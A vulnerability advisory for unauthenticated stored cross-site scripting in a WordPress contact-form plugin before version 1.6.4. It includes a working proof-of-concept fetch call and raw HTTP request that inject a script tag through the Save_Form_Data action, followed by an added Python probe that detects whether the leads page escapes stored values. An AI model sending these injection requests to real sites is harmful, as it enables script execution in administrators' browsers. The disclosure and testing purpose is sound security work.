Contact Form & Lead Form Elementor Builder < 1.6.4 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not sanitise or escape some of the lead values it stores, which allows unauthenticated users to perform Stored Cross-Site Scripting attacks against logged-in administrators who view the inserted leads. The submitting request needs no session cookie: the `Save_Form_Data` action is reachable through admin-ajax.php without authentication, and the injected value is rendered unescaped on the leads page.
Proof of Concept
```javascript
// Submit a lead with a script tag in the name field (run from any origin; no cookie needed)
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data",
  "method": "POST",
});
```

The same request as raw HTTP:
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 136
Connection: close

name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data
```
The XSS is triggered when an administrator views the stored leads at https://example.com/wp-admin/admin.php?page=all-form-leads, where the `name_1` value is echoed into the page without escaping.
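For testing a site without firing `alert()` in an administrator's browser, the following is an added example (not code from the advisory or from the plugin). It builds the same `Save_Form_Data` request as the PoC but carries a random canary inside a harmless `<b>` tag, computes `Content-Length` instead of typing it by hand, and then decides from the leads-page HTML whether the stored value came back raw (vulnerable) or entity-encoded (as `esc_html()` would produce). The two rendered rows it checks are constructed stand-ins for the plugin's leads table, not captured output; the field names and action are those shown in the PoC.

```python
"""Added example: harmless probe + escaped/unescaped check for the leads page.

Field names (name_1, email_2, ...) and the action name come from the PoC.
The HTML rows produced by render_lead_row() are constructed here to stand
in for a vulnerable and a fixed leads page; they are not plugin output.
"""
import html
import secrets
from urllib.parse import urlencode

AJAX_PATH = "/wp-admin/admin-ajax.php"
LEADS_PATH = "/wp-admin/admin.php?page=all-form-leads"


def make_canary() -> str:
    """Random token so a hit in the leads page is unambiguous and attributable."""
    return "xsscanary" + secrets.token_hex(4)


def build_probe_body(canary: str) -> str:
    """Same form fields and action as the PoC; the name field carries a
    harmless <b> tag around the canary instead of a <script> tag."""
    fields = {
        "name_1": f"<b>{canary}</b>",
        "email_2": "aa@bb.cc",
        "number_3": "434323232",
        "message_4": "x",
        "hidden_field": "1",
        "action": "Save_Form_Data",
    }
    return urlencode(fields)


def build_raw_request(host: str, body: str) -> str:
    """Raw HTTP/1.1 request in the shape of the advisory's, with Content-Length
    computed from the body. No Cookie header: the action needs no session."""
    return (
        f"POST {AJAX_PATH} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
        f"Content-Length: {len(body.encode())}\r\n"
        "Connection: close\r\n"
        "\r\n"
        f"{body}"
    )


def render_lead_row(name: str, escape: bool) -> str:
    """Stand-in for one cell of the leads table. escape=False mirrors the bug
    (value echoed as-is); escape=True is what wrapping it in esc_html() does."""
    value = html.escape(name, quote=True) if escape else name
    return f"<td>{value}</td>"


def classify_leads_page(page_html: str, canary: str) -> str:
    """Return 'vulnerable', 'escaped' or 'absent' for the stored probe value.

    A raw '<b>canary</b>' in the page means the plugin echoed the lead
    unescaped; '&lt;b&gt;canary&lt;/b&gt;' means the value was escaped."""
    raw = f"<b>{canary}</b>"
    if raw in page_html:
        return "vulnerable"
    if html.escape(raw, quote=True) in page_html:
        return "escaped"
    return "absent"


if __name__ == "__main__":
    canary = make_canary()
    print(build_raw_request("example.com", build_probe_body(canary)))
    # After an admin loads LEADS_PATH, feed the fetched HTML to
    # classify_leads_page(page_html, canary) to grade the result.
```

The probe only produces bold text if it lands unescaped, so it can be left in a client's lead list without side effects; the `alert()` payload from the PoC should be reserved for the final demonstration.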